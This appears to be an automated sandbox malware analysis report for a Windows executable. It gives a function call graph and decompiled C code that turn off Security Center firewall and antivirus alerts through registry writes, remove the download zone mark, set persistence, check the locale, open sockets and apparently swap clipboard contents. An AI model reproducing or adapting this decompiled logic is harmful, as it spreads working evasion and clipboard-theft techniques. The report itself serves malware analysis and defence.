5471->5474 5475 40b71d 5474->5475 5485 40b716 5474->5485 5491 40b610 5475->5491 5478 40b73d InterlockedIncrement 5487 40b747 5478->5487 5480 40b770 5501 4094e0 inet_ntoa 5480->5501 5482 40b77c 5483 40b840 InterlockedDecrement 5482->5483 5502 409600 shutdown closesocket 5483->5502 5485->5472 5486 408b20 __aligned_recalloc_base 7 API calls 5486->5487 5487->5480 5487->5483 5487->5486 5488 40b540 6 API calls 5487->5488 5489 40a210 170 API calls 5487->5489 5490 408c70 _invalid_parameter 3 API calls 5487->5490 5498 40a0b0 5487->5498 5488->5487 5489->5487 5490->5487 5492 40b61d socket 5491->5492 5493 40b632 htons connect 5492->5493 5494 40b68f 5492->5494 5493->5494 5495 40b67a 5493->5495 5494->5492 5496 40b683 5494->5496 5503 409600 shutdown closesocket 5495->5503 5496->5478 5496->5485 5499 409ec0 13 API calls 5498->5499 5500 40a0f1 5499->5500 5500->5487 5501->5482 5502->5485 5503->5496 5504 40b4e0 5509 40b480 5504->5509 5507 40b50e 5508 40b480 send 5508->5507 5510 40b491 send 5509->5510 5511 40b4ae 5510->5511 5512 40b4c5 5510->5512 5511->5510 5511->5512 5512->5507 5512->5508 5775 409620 5776 409623 WaitForSingleObject 5775->5776 5777 409651 5776->5777 5778 40963b InterlockedDecrement 5776->5778 5779 40964a 5778->5779 5779->5776 5780 409750 16 API calls 5779->5780 5780->5779 5781 40baa0 5787 40ec90 5781->5787 5784 40bae0 5785 40bac7 WaitForSingleObject 5791 40e0e0 5785->5791 5788 40bab6 5787->5788 5789 40ec97 5787->5789 5788->5784 5788->5785 5789->5788 5812 40eb00 5789->5812 5792 40e212 5791->5792 5793 40e0e8 5791->5793 5792->5784 5793->5792 5794 40e0f4 EnterCriticalSection 5793->5794 5795 40e190 LeaveCriticalSection SetEvent 5794->5795 5800 40e10b 5794->5800 5796 40e1c3 5795->5796 5797 40e1ab 5795->5797 5833 40bc90 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 5796->5833 5798 40e1b1 PostQueuedCompletionStatus 5797->5798 5798->5796 5798->5798 5800->5795 5801 40e11c InterlockedDecrement 5800->5801 5803 40e135 InterlockedExchangeAdd 5800->5803 5809 40e17b InterlockedDecrement 5800->5809 5801->5800 5802 40e1ce 5842 40bdd0 5802->5842 5803->5800 5805 40e148 InterlockedIncrement 5803->5805 5807 40e730 4 API calls 5805->5807 5807->5800 5809->5800 5810 40e1ff DeleteCriticalSection 5811 408c70 _invalid_parameter 3 API calls 5810->5811 5811->5792 5813 408b00 7 API calls 5812->5813 5814 40eb0b 5813->5814 5815 40ec84 5814->5815 5816 40eb18 GetSystemInfo InitializeCriticalSection CreateEventA 5814->5816 5815->5788 5817 40eb56 CreateIoCompletionPort 5816->5817 5818 40ec7f 5816->5818 5817->5818 5819 40eb6f 5817->5819 5820 40e0e0 36 API calls 5818->5820 5821 40baf0 8 API calls 5819->5821 5820->5815 5822 40eb74 5821->5822 5822->5818 5823 40eb7f WSASocketA 5822->5823 5823->5818 5824 40eb9d setsockopt htons bind 5823->5824 5824->5818 5825 40ec06 listen 5824->5825 5825->5818 5826 40ec1a WSACreateEvent 5825->5826 5826->5818 5827 40ec27 WSAEventSelect 5826->5827 5827->5818 5828 40ec39 5827->5828 5829 40ec5f 5828->5829 5830 40bba0 17 API calls 5828->5830 5831 40bba0 17 API calls 5829->5831 5830->5828 5832 40ec74 5831->5832 5832->5788 5834 40bcc6 InterlockedExchangeAdd 5833->5834 5835 40bda9 GetCurrentThread SetThreadPriority 5833->5835 5834->5835 5838 40bce0 5834->5838 5835->5802 5836 40bcf9 EnterCriticalSection 5836->5838 5837 40bd67 LeaveCriticalSection 5837->5838 5840 40bd7e 5837->5840 5838->5835 5838->5836 5838->5837 5839 40bd43 WaitForSingleObject 5838->5839 5838->5840 5841 40bd9c Sleep 5838->5841 5839->5838 5840->5835 5841->5838 5843 40bddc EnterCriticalSection 5842->5843 5850 40be52 CloseHandle CloseHandle WSACloseEvent 5842->5850 5844 40bdf8 5843->5844 5845 40be20 LeaveCriticalSection DeleteCriticalSection 5844->5845 5846 40be0b CloseHandle 5844->5846 5847 408c70 _invalid_parameter 3 API calls 5845->5847 5846->5844 5848 40be46 5847->5848 5849 408c70 _invalid_parameter 3 API calls 5848->5849 5849->5850 5851 409600 shutdown closesocket 5850->5851 5851->5810 5852 40b8a0 5855 40b8a4 5852->5855 5853 409c80 5 API calls 5853->5855 5854 40b8c0 WaitForSingleObject 5854->5855 5857 40b8e5 5854->5857 5855->5853 5855->5854 5856 40b700 184 API calls 5855->5856 5855->5857 5856->5855 5858 4041a0 GetWindowLongW 5859 4041c4 5858->5859 5860 4041e6 5858->5860 5861 4041d1 5859->5861 5862 404257 IsClipboardFormatAvailable 5859->5862 5863 4041e1 5860->5863 5869 404236 5860->5869 5870 40421e SetWindowLongW 5860->5870 5866 4041f4 SetClipboardViewer SetWindowLongW 5861->5866 5867 4041d7 5861->5867 5864 404273 IsClipboardFormatAvailable 5862->5864 5865 40426a 5862->5865 5868 4043d4 DefWindowProcA 5863->5868 5864->5865 5871 404288 IsClipboardFormatAvailable 5864->5871 5874 4042a5 OpenClipboard 5865->5874 5892 40436c 5865->5892 5866->5868 5867->5863 5872 40438d RegisterRawInputDevices ChangeClipboardChain 5867->5872 5869->5863 5873 40423c SendMessageA 5869->5873 5870->5863 5871->5865 5872->5868 5873->5863 5875 4042b5 GetClipboardData 5874->5875 5874->5892 5875->5863 5877 4042cd GlobalLock 5875->5877 5876 404375 SendMessageA 5876->5863 5877->5863 5878 4042e5 5877->5878 5879 4042f8 5878->5879 5880 404319 5878->5880 5882 40432e 5879->5882 5885 4042fe 5879->5885 5881 403fb0 13 API calls 5880->5881 5884 404304 GlobalUnlock CloseClipboard 5881->5884 5899 4040d0 5882->5899 5888 404357 5884->5888 5884->5892 5885->5884 5893 403ef0 5885->5893 5907 403480 lstrlenW 5888->5907 5891 408c70 _invalid_parameter 3 API calls 5891->5892 5892->5863 5892->5876 5894 403efb 5893->5894 5895 403f01 lstrlenW 5894->5895 5896 408b20 __aligned_recalloc_base 7 API calls 5894->5896 5897 403f14 5894->5897 5898 403f31 lstrcpynW 5894->5898 5895->5894 5895->5897 5896->5894 5897->5884 5898->5894 5898->5897 5904 4040dd 5899->5904 5900 4040e3 lstrlenA 5900->5904 5905 4040f6 5900->5905 5901 403e90 2 API calls 5901->5904 5902 408b20 __aligned_recalloc_base 7 API calls 5902->5904 5904->5900 5904->5901 5904->5902 5904->5905 5906 408c70 _invalid_parameter 3 API calls 5904->5906 5944 404080 5904->5944 5905->5884 5906->5904 5914 4034b4 5907->5914 5908 403668 5908->5891 5909 40387b StrStrW 5910 403892 StrStrW 5909->5910 5911 40388e 5909->5911 5912 4038a5 5910->5912 5913 4038a9 StrStrW 5910->5913 5911->5910 5912->5913 5917 4038bc 5913->5917 5914->5908 5915 403763 StrStrW 5914->5915 5921 40367a 5914->5921 5916 40378e StrStrW 5915->5916 5915->5921 5918 4037b9 StrStrW 5916->5918 5916->5921 5917->5908 5919 403926 isalpha 5917->5919 5930 403960 5917->5930 5918->5921 5919->5917 5920 40393d isdigit 5919->5920 5920->5908 5920->5917 5921->5908 5921->5909 5922 403ccb StrStrW 5926 403ce5 StrStrW 5922->5926 5927 403cde 5922->5927 5923 403c7d StrStrW 5924 403c90 5923->5924 5925 403c97 StrStrW 5923->5925 5924->5925 5931 403cb1 StrStrW 5925->5931 5932 403caa 5925->5932 5928 403cf8 5926->5928 5929 403cff StrStrW 5926->5929 5927->5926 5928->5929 5933 403d12 5929->5933 5934 403d19 StrStrW 5929->5934 5930->5922 5930->5923 5931->5922 5935 403cc4 5931->5935 5932->5931 5933->5934 5936 403d33 StrStrW 5934->5936 5937 403d2c 5934->5937 5935->5922 5938 403d46 lstrlenA 5936->5938 5937->5936 5938->5908 5940 403e0c GlobalAlloc 5938->5940 5940->5908 5941 403e27 GlobalLock 5940->5941 5941->5908 5942 403e3a memcpy GlobalUnlock OpenClipboard 5941->5942 5942->5908 5943 403e67 EmptyClipboard SetClipboardData CloseClipboard 5942->5943 5943->5908 5945 40408b 5944->5945 5946 404091 lstrlenA 5945->5946 5947 403e90 2 API calls 5945->5947 5948 4040c4 5945->5948 5946->5945 5947->5945 5948->5904 5513 40ece8 5514 40ecf0 5513->5514 5516 40eda4 5514->5516 5519 40ef2d 5514->5519 5518 40ed29 5518->5516 5523 40ee18 RtlUnwind 5518->5523 5520 40ef42 5519->5520 5522 40ef5e 5519->5522 5521 40efcd NtQueryVirtualMemory 5520->5521 5520->5522 5521->5522 5522->5518 5524 40ee30 5523->5524 5524->5518 5525 40b8f0 5530 40e640 5525->5530 5527 40b905 5528 40b923 5527->5528 5529 40e640 16 API calls 5527->5529 5529->5528 5531 40e650 5530->5531 5549 40e71b 5530->5549 5532 408b00 7 API calls 5531->5532 5531->5549 5533 40e678 5532->5533 5534 408ce0 8 API calls 5533->5534 5533->5549 5535 40e6a4 5534->5535 5536 40e6c0 5535->5536 5537 40e6b1 5535->5537 5550 40e5c0 WSASend 5536->5550 5538 408c70 _invalid_parameter 3 API calls 5537->5538 5540 40e6b7 5538->5540 5540->5527 5541 40e6cd 5542 40e6d6 EnterCriticalSection 5541->5542 5543 40e70c 5541->5543 5544 40e6f9 LeaveCriticalSection 5542->5544 5545 40e6ed 5542->5545 5546 408c70 _invalid_parameter 3 API calls 5543->5546 5544->5527 5545->5544 5547 40e715 5546->5547 5548 408c70 _invalid_parameter 3 API calls 5547->5548 5548->5549 5549->5527 5551 40e630 5550->5551 5552 40e5f2 WSAGetLastError 5550->5552 5551->5541 5552->5551 5553 40e5ff 5552->5553 5554 40e636 5553->5554 5555 40e606 Sleep WSASend 5553->5555 5554->5541 5555->5551 5555->5552 5556 40ecf0 5557 40eda4 5556->5557 5558 40ed0e 5556->5558 5559 40ef2d NtQueryVirtualMemory 5558->5559 5560 40ed29 5559->5560 5560->5557 5561 40ee18 RtlUnwind 5560->5561 5561->5560 5562 40def0 5563 40df80 5562->5563 5564 40df07 5562->5564 5565 40df17 5564->5565 5566 40df35 EnterCriticalSection 5564->5566 5567 40df6c LeaveCriticalSection DeleteCriticalSection 5566->5567 5570 40df4d 5566->5570 5568 408c70 _invalid_parameter 3 API calls 5567->5568 5568->5563 5569 408c70 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5569->5570 5570->5569 5571 40df6b 5570->5571 5571->5567 5961 40ea30 GetQueuedCompletionStatus 5962 40ea72 5961->5962 5967 40eae8 5961->5967 5963 40ea77 WSAGetOverlappedResult 5962->5963 5968 40e840 5962->5968 5963->5962 5964 40ea99 WSAGetLastError 5963->5964 5964->5962 5966 40eab3 GetQueuedCompletionStatus 5966->5962 5966->5967 5969 40e9d2 InterlockedDecrement setsockopt closesocket 5968->5969 5970 40e854 5968->5970 5972 40e919 5969->5972 5970->5969 5971 40e85c 5970->5971 5988 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5971->5988 5972->5966 5974 40e861 InterlockedExchange 5975 40e878 5974->5975 5976 40e92e 5974->5976 5975->5972 5981 40e889 InterlockedDecrement 5975->5981 5982 40e89c InterlockedDecrement InterlockedExchangeAdd 5975->5982 5977 40e947 5976->5977 5978 40e937 InterlockedDecrement 5976->5978 5979 40e952 5977->5979 5980 40e967 InterlockedDecrement 5977->5980 5978->5966 5983 40e5c0 4 API calls 5979->5983 5984 40e9c9 5980->5984 5981->5966 5985 40e90f 5982->5985 5986 40e95e 5983->5986 5984->5966 5987 40e7d0 7 API calls 5985->5987 5986->5966 5987->5972 5988->5974 5989 40bfb0 5995 40d8a0 5989->5995 5991 40bfc7 5992 40bff1 5991->5992 5993 40bfd8 WaitForSingleObject 5991->5993 5994 40dd00 8 API calls 5993->5994 5994->5992 5996 40d8ae 5995->5996 6003 40d98e 5995->6003 5997 408b00 7 API calls 5996->5997 5996->6003 5998 40d8be CreateEventA socket 5997->5998 5999 40d8f5 5998->5999 6000 40d8fa 5998->6000 6001 40dd00 8 API calls 5999->6001 6002 40d904 htons setsockopt bind 6000->6002 6000->6003 6001->6000 6004 40d974 CreateThread 6002->6004 6005 40d968 6002->6005 6003->5991 6004->6003 6008 40dad0 19 API calls _invalid_parameter 6004->6008 6006 40dd00 8 API calls 6005->6006 6007 40d96d 6006->6007 6007->5991 5572 4054f6 5583 4054d8 5572->5583 5573 405618 Sleep 5573->5583 5574 405509 5575 404c50 4 API calls 5574->5575 5576 40551a 5575->5576 5578 405540 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5576->5578 5582 40553b 5576->5582 5577 405628 ExitThread 5580 4055b6 wsprintfW 5578->5580 5581 4055cb wsprintfW 5578->5581 5579 404cb0 4 API calls 5579->5583 5580->5581 5584 404fc0 49 API calls 5581->5584 5583->5573 5583->5574 5583->5577 5583->5579 5584->5582 5585 405df6 ExitThread 6009 406639 6010 406642 6009->6010 6011 406651 34 API calls 6010->6011 6012 407486 6010->6012 5586 40da7f 5589 40da40 5586->5589 5587 40daab memmove 5587->5589 5588 40dabe 5589->5587 5589->5588

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 74 40d0f0-40d113 GetLocaleInfoA 75 40d116-40d123 74->75 76 40d153-40d158 75->76 77 40d125-40d129 75->77 80 40d15b-40d165 76->80 78 40d14a-40d151 77->78 79 40d12b-40d13a 77->79 78->80 79->76 83 40d13c-40d148 79->83 81 40d167-40d169 80->81 82 40d16b 80->82 84 40d16d-40d170 81->84 82->84 83->75 83->78
                                                                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                    			E0040D0F0() {
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v24;
                                                                                                                                                                                                                                                                                    				char _v25;
                                                                                                                                                                                                                                                                                    				char _v26;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				char _t26;
                                                                                                                                                                                                                                                                                    				char _t30;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t34;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				GetLocaleInfoA(0x400, 7,  &_v16, 0xa); // executed
                                                                                                                                                                                                                                                                                    				_v20 = 0x410358;
                                                                                                                                                                                                                                                                                    				_v24 =  &_v16;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t34 = _v24;
                                                                                                                                                                                                                                                                                    					_t26 =  *_t34;
                                                                                                                                                                                                                                                                                    					_v25 = _t26;
                                                                                                                                                                                                                                                                                    					if(_t26 !=  *_v20) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_v25 == 0) {
                                                                                                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                                                                                                    						_v32 = 0;
                                                                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                                                                    						_v36 = _v32;
                                                                                                                                                                                                                                                                                    						if(_v36 != 0) {
                                                                                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t34 = _v24;
                                                                                                                                                                                                                                                                                    					_t30 =  *((intOrPtr*)(_t34 + 1));
                                                                                                                                                                                                                                                                                    					_v26 = _t30;
                                                                                                                                                                                                                                                                                    					_t13 = _v20 + 1; // 0x6f00524b
                                                                                                                                                                                                                                                                                    					if(_t30 !=  *_t13) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v24 = _v24 + 2;
                                                                                                                                                                                                                                                                                    					_v20 = _v20 + 2;
                                                                                                                                                                                                                                                                                    					if(_v26 != 0) {
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				asm("sbb edx, edx");
                                                                                                                                                                                                                                                                                    				asm("sbb edx, 0xffffffff");
                                                                                                                                                                                                                                                                                    				_v32 = _t34;
                                                                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    0x0040d103
                                                                                                                                                                                                                                                                                    0x0040d109
                                                                                                                                                                                                                                                                                    0x0040d113
                                                                                                                                                                                                                                                                                    0x0040d116
                                                                                                                                                                                                                                                                                    0x0040d116
                                                                                                                                                                                                                                                                                    0x0040d119
                                                                                                                                                                                                                                                                                    0x0040d11b
                                                                                                                                                                                                                                                                                    0x0040d123
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d129
                                                                                                                                                                                                                                                                                    0x0040d14a
                                                                                                                                                                                                                                                                                    0x0040d14a
                                                                                                                                                                                                                                                                                    0x0040d15b
                                                                                                                                                                                                                                                                                    0x0040d15e
                                                                                                                                                                                                                                                                                    0x0040d165
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d16b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d167
                                                                                                                                                                                                                                                                                    0x0040d12b
                                                                                                                                                                                                                                                                                    0x0040d12e
                                                                                                                                                                                                                                                                                    0x0040d131
                                                                                                                                                                                                                                                                                    0x0040d137
                                                                                                                                                                                                                                                                                    0x0040d13a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d13c
                                                                                                                                                                                                                                                                                    0x0040d140
                                                                                                                                                                                                                                                                                    0x0040d148
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d148
                                                                                                                                                                                                                                                                                    0x0040d153
                                                                                                                                                                                                                                                                                    0x0040d155
                                                                                                                                                                                                                                                                                    0x0040d158
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,?,?,?,?,?,00405FDC), ref: 0040D103
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7a92b5bdc3f3dde32a044aaa340ec16070e5a3784df047b4ba0a0c8432a93d9b
                                                                                                                                                                                                                                                                                    • Instruction ID: f778d3e24ee8b8148d0d6da74f5cf0ba74d40266469d81105501966183134688
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a92b5bdc3f3dde32a044aaa340ec16070e5a3784df047b4ba0a0c8432a93d9b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50112874D082498EDB11CFE4C8457FEBBB1AB5A314F04829AD4603A3C1C7785A4ACBA5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 0 405e10-405e2e Sleep 1 405e38-405e44 0->1 2 405e46-405e53 PathFileExistsW 1->2 3 405e98-405eb8 CreateMutexA GetLastError 1->3 4 405e55-405e81 CopyFileW MoveFileA MoveFileW 2->4 5 405e87-405e96 2->5 6 405ec2-405f47 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 3->6 7 405eba-405ebc ExitProcess 3->7 4->5 5->1 8 405f4d-405f66 6->8 9 405fb3-405fb8 8->9 10 405f68-405f70 8->10 13 405fbe-405fd1 9->13 11 405f72-405f8d 10->11 12 405fa7-405fb1 10->12 11->9 14 405f8f-405fa5 11->14 12->13 15 405fd7-405fe2 call 40d0f0 13->15 16 40623a-406265 Sleep RegOpenKeyExA 13->16 14->8 14->12 24 405fe4-405fe6 ExitProcess 15->24 25 405fec-40603a ExpandEnvironmentStringsW wsprintfW CopyFileW 15->25 18 406351-406371 RegOpenKeyExA 16->18 19 40626b-40634b RegSetValueExA * 7 RegCloseKey 16->19 20 406377-406457 RegSetValueExA * 7 RegCloseKey 18->20 21 40645d-406472 Sleep call 40b1c0 18->21 19->18 20->21 29 4065c8-4065d1 21->29 30 406478-4065c5 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 4045f0 call 40d020 call 405ba0 CreateEventA call 40a8f0 call 40baf0 call 409d40 call 40bba0 * 4 21->30 27 406040-40606f SetFileAttributesW RegOpenKeyExW 25->27 28 406119-40615b Sleep wsprintfW CopyFileW 25->28 32 406075-40608a 27->32 33 4060fa-40610f call 40d390 27->33 28->16 31 406161-406190 SetFileAttributesW RegOpenKeyExW 28->31 30->29 36 406196-4061ab 31->36 37 40621b-406230 call 40d390 31->37 39 406090-4060af 32->39 33->28 46 406111-406113 ExitProcess 33->46 43 4061b1-4061d0 36->43 37->16 51 406232-406234 ExitProcess 37->51 39->39 40 4060b1-4060f4 RegSetValueExW RegCloseKey 39->40 40->33 43->43 48 4061d2-406215 RegSetValueExW RegCloseKey 43->48 48->37
                                                                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                    			_entry_() {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                                                                                                    				int _v532;
                                                                                                                                                                                                                                                                                    				int _v536;
                                                                                                                                                                                                                                                                                    				char _v1060;
                                                                                                                                                                                                                                                                                    				void* _v1064;
                                                                                                                                                                                                                                                                                    				char _v1588;
                                                                                                                                                                                                                                                                                    				short _v2108;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2112;
                                                                                                                                                                                                                                                                                    				short _v2636;
                                                                                                                                                                                                                                                                                    				void* _v2640;
                                                                                                                                                                                                                                                                                    				char _v3044;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v3048;
                                                                                                                                                                                                                                                                                    				int _v3052;
                                                                                                                                                                                                                                                                                    				short _v3054;
                                                                                                                                                                                                                                                                                    				short _v3056;
                                                                                                                                                                                                                                                                                    				int _v3060;
                                                                                                                                                                                                                                                                                    				int _v3064;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v3068;
                                                                                                                                                                                                                                                                                    				intOrPtr _v3072;
                                                                                                                                                                                                                                                                                    				short _v3074;
                                                                                                                                                                                                                                                                                    				signed int _v3080;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v3084;
                                                                                                                                                                                                                                                                                    				intOrPtr _v3088;
                                                                                                                                                                                                                                                                                    				short _v3090;
                                                                                                                                                                                                                                                                                    				signed int _v3096;
                                                                                                                                                                                                                                                                                    				void* _t121;
                                                                                                                                                                                                                                                                                    				int _t129;
                                                                                                                                                                                                                                                                                    				intOrPtr _t149;
                                                                                                                                                                                                                                                                                    				signed char _t179;
                                                                                                                                                                                                                                                                                    				int _t184;
                                                                                                                                                                                                                                                                                    				signed char _t192;
                                                                                                                                                                                                                                                                                    				long _t202;
                                                                                                                                                                                                                                                                                    				signed char _t203;
                                                                                                                                                                                                                                                                                    				int _t210;
                                                                                                                                                                                                                                                                                    				short _t215;
                                                                                                                                                                                                                                                                                    				intOrPtr _t219;
                                                                                                                                                                                                                                                                                    				short _t245;
                                                                                                                                                                                                                                                                                    				intOrPtr _t253;
                                                                                                                                                                                                                                                                                    				intOrPtr _t254;
                                                                                                                                                                                                                                                                                    				void* _t278;
                                                                                                                                                                                                                                                                                    				void* _t279;
                                                                                                                                                                                                                                                                                    				void* _t286;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				Sleep(0xbb8); // executed
                                                                                                                                                                                                                                                                                    				_v536 = 0;
                                                                                                                                                                                                                                                                                    				_v2112 = 0x235a;
                                                                                                                                                                                                                                                                                    				while(_v536 < _v2112) {
                                                                                                                                                                                                                                                                                    					_t210 = PathFileExistsW(L"2393737939739"); // executed
                                                                                                                                                                                                                                                                                    					if(_t210 != 0) {
                                                                                                                                                                                                                                                                                    						CopyFileW(L"297973937,", L"33973397337", 0);
                                                                                                                                                                                                                                                                                    						MoveFileA("337372927", "2282688262");
                                                                                                                                                                                                                                                                                    						MoveFileW(L"038038", L"333383737");
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v536 = _v536 + 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t121 = CreateMutexA(0, 0, "2u9o0b7n"); // executed
                                                                                                                                                                                                                                                                                    				_v2640 = _t121;
                                                                                                                                                                                                                                                                                    				if(GetLastError() != 0xb7) {
                                                                                                                                                                                                                                                                                    					_v1064 = 0;
                                                                                                                                                                                                                                                                                    					_v528 = 1;
                                                                                                                                                                                                                                                                                    					GetModuleFileNameW(0, "C:\Users\Albus\AppData\Local\Temp\2550821914.exe", 0x105);
                                                                                                                                                                                                                                                                                    					_v532 = PathFindFileNameW("C:\Users\Albus\AppData\Local\Temp\2550821914.exe");
                                                                                                                                                                                                                                                                                    					wsprintfW( &_v524, L"%s:Zone.Identifier", "C:\Users\Albus\AppData\Local\Temp\2550821914.exe");
                                                                                                                                                                                                                                                                                    					_t279 = _t278 + 0xc;
                                                                                                                                                                                                                                                                                    					DeleteFileW( &_v524); // executed
                                                                                                                                                                                                                                                                                    					ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
                                                                                                                                                                                                                                                                                    					_v3048 = 0x414bf0;
                                                                                                                                                                                                                                                                                    					_v3052 = _v532;
                                                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                                                    						_t129 = _v3052;
                                                                                                                                                                                                                                                                                    						_t215 =  *_t129;
                                                                                                                                                                                                                                                                                    						_v3054 = _t215;
                                                                                                                                                                                                                                                                                    						if(_t215 !=  *_v3048) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_v3054 == 0) {
                                                                                                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                                                                                                    							_v3060 = 0;
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							_v3064 = _v3060;
                                                                                                                                                                                                                                                                                    							if(_v3064 == 0) {
                                                                                                                                                                                                                                                                                    								L31:
                                                                                                                                                                                                                                                                                    								Sleep(0x1f4);
                                                                                                                                                                                                                                                                                    								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064) == 0) {
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064) == 0) {
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
